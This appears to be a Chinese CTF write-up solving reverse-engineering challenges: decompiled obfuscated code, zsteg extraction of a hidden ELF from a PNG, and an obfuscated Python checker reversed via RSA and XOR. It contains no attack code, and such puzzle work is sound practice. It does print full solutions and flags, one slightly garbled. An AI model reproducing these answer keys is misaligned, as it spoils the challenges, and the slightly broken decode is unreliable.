v19[29] = (dword_4052C4 | ((dword_4052D0 ^ (dword_4052CC | (((v15 & ((dword_4052D0 & ((dword_4052C4 & (dword_4052D0 ^ (~(v15 & (dword_4052D0 | ((dword_4052D0 ^ (v22[29] >> dword_4052C8)) >> dword_4052C4))) >> dword_4052C4 << dword_4052C4))) >> dword_4052D0 << dword_4052C8)) << dword_4052C4)) << dword_4052C8 << dword_4052C8) >> dword_4052D0 >> dword_4052D0))) << dword_4052CC))
v19[30] = (dword_4052C4 ^ ((v14 | ((v14 | dword_4052CC ^ ((v10 | ((dword_4052C8 & ((dword_4052C4 ^ (v14 << dword_4052C4 >> dword_4052C8 >> dword_4052C4 << dword_4052C4)) << dword_4052D0 << dword_4052C8 << dword_4052D0)) << dword_4052C4 << dword_4052CC)) >> dword_4052C4)) >> dword_4052C8)) << dword_4052CC))
v19[31] = (dword_4052CC | ((dword_4052CC & (~(dword_4052CC & (dword_4052C8 ^ (dword_4052CC | dword_4052D0 & ~((dword_4052D0 | ((v6 | ~((((dword_4052C4 ^ (v22[31] >> dword_4052D0)) << dword_4052D0) | v17) << dword_4052D0 << dword_4052D0)) >> dword_4052D0 >> dword_4052C4 << dword_4052D0 << dword_4052C8 >> dword_4052C4)) >> dword_4052C8 << dword_4052D0 << dword_4052C8)))) >> dword_4052CC)) << dword_4052D0))
v19[32] = (((dword_4052D0 & (dword_4052C4 | dword_4052CC ^ (dword_4052C8 | ((dword_4052D0 | ((dword_4052C8 | ((dword_4052CC | ~(dword_4052C4 << dword_4052C8 << dword_4052C8 >> dword_4052C4)) >> dword_4052CC >> dword_4052D0)) >> dword_4052C4)) >> dword_4052D0))) | dword_4052CC) << dword_4052D0) | dword_4052C8)
v19[33] = ~(dword_4052CC ^ dword_4052C4 ^ (~(~(dword_4052D0 & ~dword_4052C8) & dword_4052D0 | dword_4052D0 | dword_4052CC | dword_4052C4) << dword_4052D0))
print(bytes([i&0xff for i in v19]))
#ping{r3m3mb3r_70_h1d3_ur_d3bu993r}
题目说了elf在图片里,直接zsteg解出
┌──(kali?kali)-[~/ctf/1223]
└─$ zsteg elf.png -E 'b1,g,lsb,xy' > a.elf
加密也巨简单
v3[30] = 36;
v3[31] = 4933;
v3[32] = 35;
v3[33] = 78;
for ( i = 0; i <= 33; ++i )
{
if ( (i & 1) != 0 )
{
if ( i % 3 )
{
if ( i % 5 )
{
if ( (a1[i] ^ 0x1337) != v3[i] )
{
LABEL_14:
puts("Wrong!");
return v4 - __readfsqword(0x28u);
}
}
else if ( a1[i] + 5 != v3[i] )
{
goto LABEL_14;
}
}
else if ( (char)(a1[i] ^ 0x33) != v3[i] )
{
goto LABEL_14;
}
}
else if ( a1[i] - 16 != v3[i] )
{
goto LABEL_14;
}
}
printf("Correct! The flag is: %s\n", a1);
}
else
{
puts("Wrong!");
}
v3 = [96,4958,94,84,107,114,33,4866,51,108,36,4953,84,4968,98,0,70,4968,103,4868,92,95,79,4931,88,57,68,6,79,4933,36,4933,35,78]
for i in range(33):
if i%2 !=0:
if i%3 != 0:
if i%5 != 0 :
v3[i] ^= 0x1337
else:
v3[i] -= 5
else:
v3[i] ^= 0x33
else:
v3[i] +=16
print(bytes(v3))
#b'ping{m15C_4nd_r3V_w3ll_th4T5_r4r3N'
python博大精深,算是领教了,看不懂。给的是exec(b64decode(....))一步步解,最后得到一堆python代码:
𝓿 = 𝓉𝔂𝓹𝓮("m", (), {"__init__": lambda 𝔞, b: 𝓈𝔢t𝒶𝓽t𝓻(𝒶, "b", 𝔟), "s": lambda 𝒶, b: 𝔳(𝔟(𝔞.𝒷).𝓫)})
𝒸 = 𝔱𝓎𝓹𝓮("l", (), {"__init__": lambda 𝔞, 𝔟: 𝔰𝑒𝓽a𝓉𝓉𝔯(a, "b", 𝓫), "d": lambda a, 𝔟: 𝔞 if 𝓋(a.𝒷).s(𝒷).𝔟 != b(a.𝔟).𝓫 else b(𝔞.𝔟)})
𝔪 = lambda 𝔵: 𝔠(f"{𝓵𝔦𝓈𝔱(𝓏𝔦𝔭([𝓁(𝔦 + 5*𝔦) for i in 𝔁], [𝔩(𝔦 + 𝓲) for 𝔦 in 𝔵][::-1]))[::-1] = }")
𝔫 = lambda x: 𝒸("{x[';]:=^450}".form𝒶𝓽(𝔵={"';": 𝔵}))
𝔩 = lambda 𝔁: (12648430 ^ (𝔵 + 3735928559)) * 3862272608
𝓀 = 𝓲n𝔭𝔲𝓽("Insert your flag: ")
𝓈 = [(lambda 𝔷, f, x, 𝔫: 𝓍 if 𝓷 == 0 else 𝔣(𝔷, 𝒻, (lambda 𝓶, 𝓃: (lambda 𝓍: 𝒾n𝔱(𝔁[l𝔢𝔫(𝔵)-59:], 2) + 𝒾𝓷𝓽(𝔵[:𝔩𝓮n(𝔁)-59], 2) if 𝔩e𝔫(𝔁)-59 > 0 else 𝔦n𝓽(𝔵,2))(b𝒾𝔫(𝓶 * 𝓷)))(𝔁, 𝔃), n - 1))(𝔰𝔲𝓂((o𝔯𝔡(𝔨[𝓲+𝒿]) << 𝒿*7) if i+j < l𝔢𝔫(𝓴) else (127 << 𝒿*7) for 𝔧 in 𝓇𝔞n𝑔𝔢(8)), (lambda 𝔷, 𝓯, x, 𝔫: x if 𝔫 == 0 else f(𝔷, 𝓯, (lambda 𝔫, 𝔪: (lambda 𝔵: in𝔱(x[𝓁e𝔫(𝓍)-59:], 2) + 𝓲nt(𝔁[:𝓁𝑒𝔫(𝔵)-59], 2) if 𝓵𝑒𝔫(𝓍)-59 > 0 else 𝒾n𝓽(x,2))(𝓫𝔦𝔫(𝓷 * 𝔪)))(𝔁, 𝔷), 𝔫 - 1)), 1, 420_69) for 𝔦 in 𝓇a𝓷𝑔e(0, 𝓁𝔢𝓷(𝔨), 8)]
print(𝓬(s).𝔡(𝔪).𝒹(𝔫).b)
if 𝓬(s).𝔡(𝔪).𝒹(𝔫).b == "=𝓵𝔦𝓈𝔱(𝓏𝔦𝔭([𝓁(𝔦 + 5*𝔦) for i in 𝔁], [𝔩(𝔦 + 𝓲) for 𝔦 in 𝔵][::-1]))[::-1] = [(13969439442922757926633137632, 3251133470245911671632840864), (6919844817045365871489845728, 3067821989026578174692487328), (11408842561461143227463443808, 3766356150094573135206359136), (11299068421490417286376379488, 3802947530149782083826679648), (9203465938188223031329433888, 2306614948612889330244181216), (9753400381846729757945770272, 4656479823873291748257812704)]==":
𝔭𝓻i𝓷t("Good flag!")
else:
𝓹r𝔦𝔫𝔱("Wrong flag!")
python不只可以识别这些符号而且还能当成正常字符处理。按WP大至理解一下:
加密分3步,
1是每8个1组按7位ascii码2进制连一起,高位补127,
2是作个rsa运算,通过lambda造了个
3比较简单加异或再乘
最后把正反两次作的结果反转后比较
'''
1,每ascii取7位,每组8个,最后加1111111
𝔰𝔲𝓂((o𝔯𝔡(𝔨[𝓲+𝒿]) << 𝒿*7) if i+j < l𝔢𝔫(𝓴) else (127 << 𝒿*7) for 𝔧 in 𝓇𝔞n𝑔𝔢(8))
2,e = 42069 n= 2**59-1 RSA pow(m,e,n)
int(x,2)(bin(n*m))
(lambda 𝔫, 𝔪: (lambda 𝔵: in𝔱(x[𝓁e𝔫(𝓍)-59:], 2) + 𝓲nt(𝔁[:𝓁𝑒𝔫(𝔵)-59], 2) if 𝓵𝑒𝔫(𝓍)-59 > 0 else 𝒾n𝓽(x,2))(𝓫𝔦𝔫(𝓷 * 𝔪)))
len(x)<59
𝓈 = [(lambda 𝔷, f, x, 𝔫: 𝓍 if 𝓷 == 0 else 𝔣(𝔷, 𝒻, (lambda 𝓶, 𝓃: (int(x,2))(bin(m*n)))(𝔁, 𝔃), n - 1))
(sum((ord(f[i+j]) << j*7) if i+j < len(k) else (127 << j*7) for for i in range(8)),
(lambda 𝔷, 𝓯, x, 𝔫: x if 𝔫 == 0 else f(𝔷, 𝓯, (int(x,2))(bin(n*m)))(x, z), n - 1)), 1, 42069) for i in range(0, len(t), 8)]
3,
lambda 𝔁: (12648430 ^ (𝔵 + 3735928559)) * 3862272608
'''
good = [(13969439442922757926633137632, 3251133470245911671632840864), (6919844817045365871489845728, 3067821989026578174692487328), (11408842561461143227463443808, 3766356150094573135206359136), (11299068421490417286376379488, 3802947530149782083826679648), (9203465938188223031329433888, 2306614948612889330244181216), (9753400381846729757945770272, 4656479823873291748257812704)]
n = 2**59-1
p,q = 3203431780337,179951
e = 42069
d = invert(e, (p-1)*(q-1))
flag = ''
for i in good:
v = (((i[1]//3862272608)^12648430)-3735928559)//2
v = pow(v,d,n)
flag+=''.join([chr((v>>j*7)&0x7f) for j in range(8)])
print(flag)
#'ping{W0w_y0U_rYl1y_g0oD_4t_Py7h0n_c0nGr4Tz}\x7f\x7f\x7f\x7f\x7f'